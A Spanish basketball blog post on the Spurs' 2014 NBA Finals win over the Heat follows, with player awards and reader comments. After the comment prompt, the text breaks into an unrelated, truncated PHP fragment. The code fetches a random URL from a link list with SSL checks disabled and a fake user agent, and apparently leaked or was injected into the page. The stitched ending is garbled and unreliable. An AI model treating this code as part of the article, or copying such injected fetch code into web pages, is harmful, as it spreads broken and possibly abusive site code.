La Crónica: 15 años después

16 de June de 2014 por TheDeerHunter

Se acabó. Nuevo paseo militar de los Spurs en la que ha terminado siendo una de las finales más desequilibradas de la historia (14 puntos de diferencia de promedio, nada menos). Habrá tiempo para analizarlo detenidamente pero la brillante victoria de anoche certificó que Duncan, Popovich y el resto se colocan muy arriba en la mitología de esta competición, mientras evitan de un plumazo que estos Heat pudieran adelantarles por la derecha. Ya no se podrá decir que los Heat de los “Beach Boys” fueron superiores a ellos. Asimismo inflijen al actual proyecto de Riley un rejonazo del que tendrán muy difícil recuperarse.

La de anoche fue la misma historia que hemos vivido los últimos días. Lebron James siempre quiso emular a las grandes leyendas y en esta serie le ha tocado hacerlo con el Jerry West más trágico que, junto a Elgin Baylor, claudicó  una y otra vez ante el ideario colectivo de los Celtics de Auerbach, Russell y demás “hall of famers”. Más de 30 puntos, 10 rebotes y 5 asistencias que se van al limbo en uno de los “esfuerzos en vano” más duros de toda la historia. Con ellos Lebron se une al club formado por el propio West, el Dennis Johnson del 87 y Karl Malone, otros ilustres que sucumbieron en las finales a pesar de números parecidos. Pocos reproches al “Elegido” a diferencia de Dwyane Wade, Chris Bosh y el resto del equipo que ha estado tan lejos de lo exigible como comprobamos ayer en el choque definitivo. 

La resistencia de los Heat duró cuarto y poco, lo que tardaron los Spurs en poner el modo crucero con Tim Duncan impartiendo un nuevo clínic, Manu Ginobili tocando la guitarra y Kawhi Leonard desatado hacía el MVP. Premio merecidísimo pero que en realidad podrían habérselo dado a cualquiera de ellos más Tony Parker o incluso Boris Diaw. Sólo faltaba que ayer le diera a Patty Mills por anotar casi todo lo que lanzó. Ojo porque estos Spurs han sido el equipo más más anotador de todos los tiempos en una final (118.5 x 100 posesiones, superando a los Pistons del 89) y también los más eficaces (52.8% superando a los Bulls del 91). Poca broma.

Así que nos encontramos ante una paradoja. Maravillosa brillantez de los merecidos campeones, que han sido efectivamente los mejores en casi todo… y al mismo tiempo un cierto regusto a decepción. Lógicamente nos quedamos con ganas de más. Toca aguantarse hasta el curso que viene.

PREMIOS

MVP: Kawhi Leonard llegó a la media parte con tres tercios del MVP ya en el bolsillo y si no acabó con unos números mejores fue porque tuvo que sentarse en el banco varios minutos con problemas de faltas. Sinó sus 22 puntos y 10 rebotes hubiera sido aún mejores.

Sorpresa: Tony Parker estuvo desaparecido hasta el final del tercer cuarto (0 de 10 llevaba el francés en ese momento) pero por suerte Patty Mills había calibrado su punto de mira a la perfección antes de saltar a pista y acabó con 17 puntos, 14 de ellos tras la reanudación.

Decepción: Ha sido muy doloroso comprobar lo irreconocible que ha estado Dwyane Wade durante estas finales. El partido de ayer fue una clara muestra: desacertado en ataque (11 puntos con un 4 de 12y 3 pérdidas) y aún peor en defensa.

Esfuerzo en vano: Ya lo comentábamos en la crónica: 31 puntos, 10 rebotes y 5 asistencias que no sirvieron ni para inquietar a los a la postre campeones. Lebron James tuvo que luchar prácticamente en solitario y así es imposible ganar.

Imágenes | AP Photos / Getty Images

Comenta

10 comentarios a esta entrada

  1. dunc dice:
    #1

    Lagrimones!!

    Volveré a rescatar del armario la camiseta blanca de los spurs con el 21 a la espalda, esa que me compré hace ya 15 años.

    Grande LeBron por otra parte, por su juego, su actitud y su saber perder. Otro gran campeón.

      Citar

  2. Denise dice:
    #2

    Supongo que este es el fin del Big 3 de Miami tal y como lo conocemos y con Spoelstra al frente, no?
    El Big 3 ha sido todo un éxito, ya que en 4 años, 4 finales y 2 anillos no se consiguen todos los días, pero creo que para los de Florida ha llegado la famosa palabra de “fin de ciclo”, y a Wade lo empaquetaría por varios jugadores que le den más profundidad de banquillo. A Bosh con una buena oferta en la mano también.

      Citar

  3. Jose Luis dice:
    #3

    Acaban contrato Denise. Bosh buscará un contrato largo rondando 20 millones, y Wade veremos qué hace… LeBron creo que debería irse igualmente.

      Citar

  4. Denise dice:
    #4

    Jose Luis:
    Acaban contrato Denise. Bosh buscará un contrato largo rondando 20 millones, y Wade veremos qué hace… LeBron creo que debería irse igualmente.

    Bueno, tienen una Player Option, que no viene a ser exactamente lo mismo.

      Citar

  5. Lucho dice:
    #5

    Ahora como hago para no pensar que estos Spurs 13/14 fueron el campeon mas brillante de la historia?

      Citar

  6. GreenPride dice:
    #6

    Pues se acabó lo que se daba.
    Impresionante baño de los San Antonio Spurs a los Miami Heat no hoy sino en los tres últimos partidos de las finales.
    Este último partido de las finales pareció que las cosas iban a ser diferentes de inicio. Unos Heat subidos a hombros del rey apretaban en defensa y se iban 22-6 en el inicio del partido. Spoelstra había quitado a Chalmers para poner a Allen en el quinteto inicial y la defensa Heat apretaba para lanzar a su equipo… pero sólo duró ese arranque. De repente entró Manudona y todo se acabó. Triple y dos mas uno de Manu para lanzar a unos Spurs que ya no pararían la máquina hasta verse más de 20 arriba. Con Duncan imponiéndose en la zona, Manudo desatado, Mills acribillando desde el triple, Diaw y Splitter repartiendo juego y un impresionante Kawhi en ambos lados de la cancha se pusieron las botas en ataque y sobre todo pararon en seco a los Heat en cuanto LeBron dejó de meter puntos a porrillo.
    Los Heat se han ido diluyendo hasta parecer una total caricatura de equipo. Sólo LeBron se ha mantenido en pie. Wade ha dado muestras de que un jugador que está mal físicamente todo el año difícilmente puede revivir para ser decisivo en los Playoffs y Bosh no ha sabido ser un segundo espada eficaz al lado de LeBron. LeBron ha hecho unas series muy buenas pero se ha ido encontrando cada día más sólo que el anterior.
    Ahora se abren muchas interrogantes en ambos equipos. Por los campeones una vez que se sabe que Pops continuará en el banquillo, ¿Retirada del gran Tim o seguirá para intentar el no va más de un back to back? ¿Conservarán el hambre los veteranos y el físico para un nuevo intento? Yo creo que lo intentarán de nuevo el año que viene y que ese sí será el canto del cisne para este equipo increíble. ¿Alguien se atreve a pronosticar contra ellos?
    Y en los subcampeones todo tipo de dudas. El Big Three tiene Player Option y la pregunta es ¿Seguirá LeBron? Esta pregunta puede cambiar la fisonomía de la NBA tal como la conocemos ahora. Si LeBron no continua, ¿Cual seria su destino? ¿Vuelta a casa para liderar un equipazo joven con Irving, Embiid, Waiters, Thompson, Varejao, Bennet y demás? ¿Apostar por la historia yendose a Lakers o Knicks con algún otro agente libre? ¿Otro sitio? Si el decidiera irse, ¿Bosh y Wade se irian? Yo creo que Wade terminará su carrera en Miami porque no veo que los Heat puedan sacar nada a cambio de él mientras que si LeBron se va es casi seguro que Bosh cogerá carretera y manta para salir también del equipo. Lo que está claro es que si se quedan el resto del equipo tendrá que ser nuevo visto su rendimiento en las Finales. Y si no, también. Difícil tarea la que espera este verano a Mister Gominas.

      Citar

  7. HisRoyalAirness dice:
    #7

    Lo acabo de terminar de ver. En pie y ovación para estos mitos. Nada más que añadir

      Citar

  8. Pop dice:
    #8

      Citar

  9. Ruxixon dice:
    #9

    El año que viene con los Spurs un año más viejos,si,ya tienen que bajar….

    Y llevamos así,fácil,5 años.

      Citar

  10. Lucho dice:
    #10

    -Esto es, ha representado Miami una sombra no por serlo, sino básicamente por acaparar San Antonio toda la luz
    -En cierto modo el reconocimiento final al fascinante Kawhi Leonard no es sino una metáfora de cómo los Spurs podrían convertir a cualquier elemento de su sistema en crucial. Porque en realidad lo crucial es justamente la forma en la que se comporta el sistema, siempre por encima de sus individuos. Un plan, eso sí, alejado de lo puramente mecanizado y con licencia creativa

    http://kiaenzona.com/nba/trance-y-retrospectiva-en-los-san-antonio-spurs-por-andres-monje-8427/

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>